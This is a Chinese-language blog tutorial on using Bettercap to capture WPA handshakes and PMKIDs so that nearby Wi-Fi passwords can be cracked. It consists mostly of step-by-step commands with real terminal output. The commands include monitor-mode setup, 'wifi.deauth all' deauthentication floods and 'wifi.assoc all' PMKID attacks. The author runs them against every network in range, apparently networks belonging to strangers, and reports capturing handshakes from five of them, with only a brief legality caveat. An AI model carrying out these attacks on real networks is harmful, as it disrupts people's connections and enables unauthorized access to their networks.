技术笔记
2020-01-30
Bettercap破解Wi-Fi网络
Bettercap是一个非常强大、灵活可移植的中间人攻击框架,它具有跨平台、轻量级以及模块化等优点,在渗透测试过程中能够非常好的进行中间人测试。我们将使用Bettercap的两个模块来帮助我们搜索弱的Wi-Fi密码。
安装Bettercap
如果安装了Kali Linux,则可以在“应用程序”菜单中的“嗅探和欺骗”文件夹中或通过搜索找到它。
~# apt install bettercap
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following package was automatically installed and is no longer required:
liblinear3
Use 'apt autoremove' to remove it.
The following additional packages will be installed:
bettercap-caplets
Suggested packages:
bettercap-ui
The following NEW packages will be installed:
bettercap bettercap-caplets
0 upgraded, 2 newly installed, 0 to remove and 1854 not upgraded.
Need to get 6,931 kB of archives.
After this operation, 25.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap amd64 2.26.1-0kali1 [6,821 kB]
Get:2 http://archive.linux.duke.edu/kalilinux/kali kali-rolling/main amd64 bettercap-caplets all 0+git20191009-0kali1 [110 kB]
Fetched 6,931 kB in 3s (2,332 kB/s)
Selecting previously unselected package bettercap.
(Reading database ... 417705 files and directories currently installed.)
Preparing to unpack .../bettercap_2.26.1-0kali1_amd64.deb ...
Unpacking bettercap (2.26.1-0kali1) ...
Selecting previously unselected package bettercap-caplets.
Preparing to unpack .../bettercap-caplets_0+git20191009-0kali1_all.deb ...
Unpacking bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap-caplets (0+git20191009-0kali1) ...
Setting up bettercap (2.26.1-0kali1) ...
bettercap.service is a disabled or a static unit, not starting it.启动Bettercap
Usage of bettercap:
-autostart string
Comma separated list of modules to auto start. (default "events.stream")
-caplet string
Read commands from this file and execute them in the interactive session.
-cpu-profile file
Write cpu profile file.
-debug
Print debug messages.
-env-file string
Load environment variables from this file if found, set to empty to disable environment persistence.
-eval string
Run one or more commands separated by ; in the interactive session, used to set variables via command line.
-gateway-override string
Use the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
-iface string
Network interface to bind to, if empty the default interface will be auto selected.
-mem-profile file
Write memory profile to file.
-no-colors
Disable output color effects.
-no-history
Disable interactive session history file.
-silent
Suppress all logs which are not errors.
-version
Print the version and exit.iface,它允许我们定义要使用的接口
连接网络适配器并开始
现在,我们需要将卡置于监视模式。如果我们已经连接到Wi-Fi网络,则Bettercap会开始嗅探该网络,因此始终以监视模式为第一位。
使用ifconfig或ip a找到您的网卡,以找到您的网络适配器的名称。对于内部适配器,应为wlan0;对于USB网络适配器,应为wlan1。
~# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 50:7b:9d:7a:c8:8a txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 38625 bytes 3052647 (2.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 38625 bytes 3052647 (2.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.5.93 netmask 255.255.255.0 broadcast 192.168.5.255
inet6 prefixlen 64 scopeid 0x20<link>
ether txqueuelen 1000 (Ethernet)
RX packets 451 bytes 119964 (117.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 364 bytes 115672 (112.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 18:d6:c7:0e:e7:a1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0使用与监视器模式兼容的适配器,然后通过打开终端窗口并键入airmon-ng start wlan1,将wlan1替换为网络适配器的名称
~# airmon-ng start wlan1
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
559 NetworkManager
621 wpa_supplicant
14785 dhclient
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)
phy3 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enabled for [phy3]wlan1 on [phy3]wlan1mon)
(mac80211 station mode vif disabled for [phy3]wlan1)然后,您可以再次键入ifconfig或ipa来验证它是否已启动。
~# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 50:7b:9d:7a:c8:8a txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 38645 bytes 3053647 (2.9 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 38645 bytes 3053647 (2.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.5.93 netmask 255.255.255.0 broadcast 192.168.5.255
inet6 prefixlen 64 scopeid 0x20<link>
ether txqueuelen 1000 (Ethernet)
RX packets 490 bytes 126996 (124.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 386 bytes 126911 (123.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 18-D6-C7-0E-E7-A1-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 1202 bytes 363761 (355.2 KiB)
RX errors 0 dropped 1176 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0确保无线卡处于监视模式后,可以通过在新的终端窗口中键入sudo Bettercap --iface wlan1mon来启动Bettercap,用卡名替换“ wlan1”部分。
~# sudo bettercap --iface wlan1mon
bettercap v2.24.1 (built for linux amd64 with go1.12.7) [type 'help' for a list of commands]
wlan1 »Bettercap打开后,键入help以查看所有正在运行的模块和命令的列表。在模块中,您可以看到默认情况下未启动Wi-Fi模块。
wlan1 » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Modules
any.proxy > not running
api.rest > not running
arp.spoof > not running
ble.recon > not running
caplets > not running
dhcp6.spoof > not running
dns.spoof > not running
events.stream > running
gps > not running
http.proxy > not running
http.server > not running
https.proxy > not running
https.server > not running
mac.changer > not running
mysql.server > not running
net.probe > not running
net.recon > running
net.sniff > not running
packet.proxy > not running
syn.scan > not running
tcp.proxy > not running
ticker > not running
update > not running
wifi > not running
wol > not running扫描附近的网络
我们可以在Wi-Fi模块下发出的命令。我们可以通过在Bettercap中键入help wifi来查看此信息。
wlan1 » help wifi
wifi (running): A module to monitor and perform wireless attacks on 802.11.
wifi.recon on : Start 802.11 wireless base stations discovery and channel hopping.
wifi.recon off : Stop 802.11 wireless base stations discovery and channel hopping.
wifi.clear : Clear all access points collected by the WiFi discovery module.
wifi.recon MAC : Set 802.11 base station address to filter for.
wifi.recon clear : Remove the 802.11 base station filter.
wifi.deauth BSSID : Start a 802.11 deauth attack, if an access point BSSID is provided, every client will be deauthenticated, otherwise only the selected client. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate every access point with at least one client and start a deauth attack for each one.
wifi.assoc BSSID : Send an association request to the selected BSSID in order to receive a RSN PMKID key. Use 'all', '*' or a broadcast BSSID (ff:ff:ff:ff:ff:ff) to iterate for every access point.
wifi.ap : Inject fake management beacons in order to create a rogue access point.
wifi.show.wps BSSID : Show WPS information about a given station (use 'all', '*' or a broadcast BSSID for all).
wifi.show : Show current wireless stations list (default sorting by essid).
wifi.recon.channel : WiFi channels (comma separated) or 'clear' for channel hopping.
Parameters
wifi.ap.bssid : BSSID of the fake access point. (default=<random mac>)
wifi.ap.channel : Channel of the fake access point. (default=1)
wifi.ap.encryption : If true, the fake access point will use WPA2, otherwise it'll result as an open AP. (default=true)
wifi.ap.ssid : SSID of the fake access point. (default=FreeWiFi)
wifi.assoc.open : Send association requests to open networks. (default=false)
wifi.assoc.silent : If true, messages from wifi.assoc will be suppressed. (default=false)
wifi.assoc.skip : Comma separated list of BSSID to skip while sending association requests. (default=)
wifi.deauth.open : Send wifi deauth packets to open networks. (default=true)
wifi.deauth.silent : If true, messages from wifi.deauth will be suppressed. (default=false)
wifi.deauth.skip : Comma separated list of BSSID to skip while sending deauth packets. (default=)
wifi.handshakes.file : File path of the pcap file to save handshakes to. (default=~/bettercap-wifi-handshakes.pcap)
wifi.hop.period : If channel hopping is enabled (empty wifi.recon.channel), this is the time in milliseconds the algorithm will hop on every channel (it'll be doubled if both 2.4 and 5.0 bands are available). (default=250)
wifi.region : Set the WiFi region to this value before activating the interface. (default=BO)
wifi.rssi.min : Minimum WiFi signal strength in dBm. (default=-200)
wifi.show.filter : Defines a regular expression filter for wifi.show (default=)
wifi.show.limit : Defines limit for wifi.show (default=0)
wifi.show.sort : Defines sorting field (rssi, bssid, essid, channel, encryption, clients, seen, sent, rcvd) and direction (asc or desc) for wifi.show (default=rssi asc)
wifi.skip-broken : If true, dot11 packets with an invalid checksum will be skipped. (default=true)
wifi.source.file : If set, the wifi module will read from this pcap file instead of the hardware interface. (default=)
wifi.txpower : Set WiFi transmission power to this value before activating the interface. (default=30)我们将选择Wi-Fi侦听模块。要启动它,请在 Bettercap中键入wifi.recon。一旦开始检测到网络,您将开始收到大量的消息。如果不知所措,则可以键入events.stream off以使警报静音。
wlan1 » wifi.recon on
[23:01:35] [sys.log] [inf] wifi WiFi region set to 'BO'
[23:01:35] [sys.log] [inf] wifi interface wlan1 txpower set to 30
[23:01:35] [sys.log] [inf] wifi started (min rssi: -200 dBm)
wlan1 » [23:01:35] [sys.log] [inf] wifi channel hopper started
wlan1 » [23:01:35] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:35] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:35] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:36] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:37] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:38] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:38] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:01:38] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:01:39] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:39] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:01:39] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:41] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:41] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:41] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:01:42] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:42] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:01:42] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:01:42] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:42] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:43] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:52] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:52] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████
wlan1 » [23:01:52] [wifi.ap.new] wifi access point ████████████████████████████████████████████████████████████要查看已检测到的网络,请键入wifi.show以显示网络列表。
wlan1 » wifi.show
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴ | BSSID | SSID | Encryption | WPS | Ch | Clients | Sent | Recvd | Seen |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (TKIP, PSK) | | 6 | | | | 23:01:35 |
| -57 dBm | ██:██:██:██:██:██ | █████████████ | OPEN | | 6 | 1 | 400 B | 66 B | 23:01:36 |
| -63 dBm | ██:██:██:██:██:██ | ██████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:01:36 |
| -64 dBm | ██:██:██:██:██:██ | ██████████ | WPA2 (TKIP, PSK) | 2.0 | 5 | 1 | 7.1 kB | 128 B | 23:01:37 |
| -66 dBm | ██:██:██:██:██:██ | ████████████████ | WPA (TKIP, PSK) | | 1 | | | | 23:01:39 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, PSK) | | 1 | | | | 23:01:35 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████ | WPA2 (CCMP, PSK) | | 6 | | | | 23:01:35 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████ | OPEN | | 11 | | | | 23:01:43 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████ | WPA2 (CCMP, PSK) | | 7 | | | | 23:01:43 |
| -82 dBm | ██:██:██:██:██:██ | | WPA2 (CCMP, PSK) | 2.0 | 6 | | 3.9 kB | | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | ████████████████ | OPEN | | 1 | 1 | | 177 B | 23:01:35 |
| -86 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, MGT) | | 1 | | | | 23:01:38 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, PSK) | | 6 | | | | 23:01:38 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████ | WPA2 (CCMP, PSK) | | 6 | 1 | 670 B | 384 B | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, MGT) | | 6 | | | | 23:01:39 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, MGT) | | 6 | | | | 23:01:37 |
| -87 dBm | ██:██:██:██:██:██ | █████████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 8 | | | | 23:01:36 |
| -87 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 6 | | 759 B | | 23:01:44 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████ | OPEN | | 6 | 1 | 228 B | 1.2 kB | 23:01:43 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:01:44 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████ | OPEN | | 8 | | | | 23:01:41 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:01:41 |
| -90 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, MGT) | | 6 | | | | 23:01:41 |
| -91 dBm | ██:██:██:██:██:██ | ██████████ | WPA2 (TKIP, PSK) | | 11 | | | | 23:01:41 |
| -92 dBm | ██:██:██:██:██:██ | ██ | WPA2 (CCMP, PSK) | 2.0 | 11 | | | | 23:01:35 |
| -92 dBm | ██:██:██:██:██:██ | <hidden> | OPEN | | 6 | | | | 23:01:37 |
| -92 dBm | ██:██:██:██:██:██ | ████████ | WPA2 (TKIP, PSK) | | 11 | | | | 23:01:37 |
| -94 dBm | ██:██:██:██:██:██ | █████████████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:01:37 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:01:42 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:01:41 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
wlan1mon (ch. 12) / ↑ 0 B / ↓ 1.5 MB / 6556 pkts我们可以看到有关我们附近无线环境的大量信息,例如哪些网络最强大以及它们使用哪种加密。
使用Deauth攻击进行攻击
要启动deauth模块,您将键入wifi.deauth,然后键入您要攻击的网络的MAC地址。如果您想攻击找到的每个网络,则可以键入all或*,但是请注意,如果您干扰某人的Wi-Fi,而该Wi-Fi不允许您对其进行测试,则这可能是非法的。
wlan1 » wifi.deauth all
wlan1 » [23:02:53] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1 » [23:02:54] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:02:55] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1 » [23:02:55] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:02:56] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1 » [23:02:57] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:02:57] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1 » [23:02:58] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:02:59] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1 » [23:03:00] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1 » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:02] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:02] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1 » [23:03:03] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1 » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1 » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1 » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1 » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1 » [23:03:06] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1 » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1 » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████wifi.show并查看是否有红色结果来查看结果。在我们的示例中,我们可以看到我们已成功为我们检测到的附近三个Wi-Fi网络握手。
wlan1 » wifi.show
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴ | BSSID | SSID | Encryption | WPS | Ch | Clients | Sent | Recvd | Seen |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 6 | 5 | 12 kB | | 23:03:06 |
| -57 dBm | ██:██:██:██:██:██ | █████████████ | WPA2 (CCMP, PSK) | | 6 | 1 | 6.5 kB | 66 B | 23:03:04 |
| -63 dBm | ██:██:██:██:██:██ | ██████ | WPA2 (CCMP, PSK) | | 11 | 2 | 1.2 kB | | 23:03:04 |
| -64 dBm | ██:██:██:██:██:██ | ██████████ | WPA2 (CCMP, PSK) | 2.0 | 5 | 2 | 7.1 kB | 128 B | 23:03:02 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, PSK) | | 1 | 2 | 353 B | | 23:03:05 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████ | WPA2 (CCMP, PSK) | | 6 | 1 | 4.9 kB | | 23:03:06 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:03:06 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████ | WPA2 (CCMP, PSK) | | 7 | | | | 23:03:07 |
| -86 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 1 | | | | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, PSK) | | 6 | | | | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████ | WPA2 (CCMP, PSK) | | 6 | | 670 B | 384 B | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, MGT) | | 6 | | | | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, MGT) | | 6 | | | | 23:03:01 |
| -87 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 6 | | 759 B | | 23:03:02 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████ | WPA2 (CCMP, PSK) | | 6 | | 228 B | 1.2 kB | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████ | WPA2 (CCMP, PSK) | | 8 | | | | 23:03:04 |
| -90 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 6 | | | | 23:03:06 |
| -91 dBm | ██:██:██:██:██:██ | ██████████ | WPA2 (TKIP, PSK) | | 11 | | 1.7 kB | | 23:03:04 |
| -92 dBm | ██:██:██:██:██:██ | ██ | WPA2 (CCMP, PSK) | 2.0 | 11 | | | | 23:03:08 |
| -92 dBm | ██:██:██:██:██:██ | ████████ | WPA2 (TKIP, PSK) | | 11 | | | | 23:03:08 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:03:09 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:03:09 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
wlan1mon (ch. 12) / ↑ 73 kB / ↓ 8.9 MB / 28100 pkts / 2 handshakes使用set wifi.handshake,然后使用要在其中保存文件的目录。
wlan1 » set wifi.handshakes '/desiredfolderlocation'用PMKID攻击进行攻击
要开始网络进行攻击,wifi.assoc,然后输入我们要攻击的MAC地址。如果我们要攻击我们检测到的所有网络,请输入all或*代替。如果关闭了events.stream,但是希望看到此模块的结果,则可以通过在on上键入events.stream并监视如下所示的结果来重新启用事件流。
wlan1 » wifi.assoc all
wlan1 » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1 » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1 » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1 » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1 » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap看一下wifi.show的结果。如果幸运的话,我们应该看到更多的红色网络。尽管下面没有颜色,但其中有五个确实是红色。
wlan1 » wifi.show
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴ | BSSID | SSID | Encryption | WPS | Ch | Clients | Sent | Recvd | Seen |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 6 | 5 | 12 kB | | 23:04:36 |
| -57 dBm | ██:██:██:██:██:██ | █████████████ | WPA2 (CCMP, PSK) | | 6 | 1 | 6.5 kB | 66 B | 23:04:34 |
| -63 dBm | ██:██:██:██:██:██ | ██████ | WPA2 (CCMP, PSK) | | 11 | 2 | 1.2 kB | | 23:04:34 |
| -64 dBm | ██:██:██:██:██:██ | ██████████ | WPA2 (CCMP, PSK) | 2.0 | 5 | 2 | 7.1 kB | 128 B | 23:04:32 |
| -90 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 6 | | | | 23:04:36 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, PSK) | | 1 | 2 | 353 B | | 23:04:35 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████ | WPA2 (CCMP, PSK) | | 6 | 1 | 4.9 kB | | 23:04:36 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, MGT) | | 6 | | | | 23:04:31 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:04:36 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████ | WPA2 (CCMP, PSK) | | 7 | | | | 23:04:37 |
| -86 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 1 | | | | 23:04:31 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████ | WPA2 (CCMP, PSK) | | 6 | | | | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████ | WPA2 (CCMP, PSK) | | 6 | | 670 B | 384 B | 23:04:32 |
| -86 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, MGT) | | 6 | | | | 23:04:31 |
| -87 dBm | ██:██:██:██:██:██ | <hidden> | WPA2 (CCMP, PSK) | | 6 | | 759 B | | 23:04:32 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████ | WPA2 (CCMP, PSK) | | 6 | | 228 B | 1.2 kB | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:04:34 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████ | WPA2 (CCMP, PSK) | | 8 | | | | 23:04:34 |
| -91 dBm | ██:██:██:██:██:██ | ██████████ | WPA2 (TKIP, PSK) | | 11 | | 1.7 kB | | 23:04:34 |
| -92 dBm | ██:██:██:██:██:██ | ██ | WPA2 (CCMP, PSK) | 2.0 | 11 | | | | 23:04:38 |
| -92 dBm | ██:██:██:██:██:██ | ████████ | WPA2 (TKIP, PSK) | | 11 | | | | 23:04:38 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:04:39 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:04:39 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
wlan1mon (ch. 12) / ↑ 45 kB / ↓ 8.9 MB / 38377 pkts / 3 handshakes通过运行这两个模块,我们能够获取十个最接近的Wi-Fi网络中的五个所需的信息。真是令人印象深刻。如果打开从这些捕获生成的文件Bettercap,则可以看到Bettercap保存的信息,以供我们破解另一个程序。
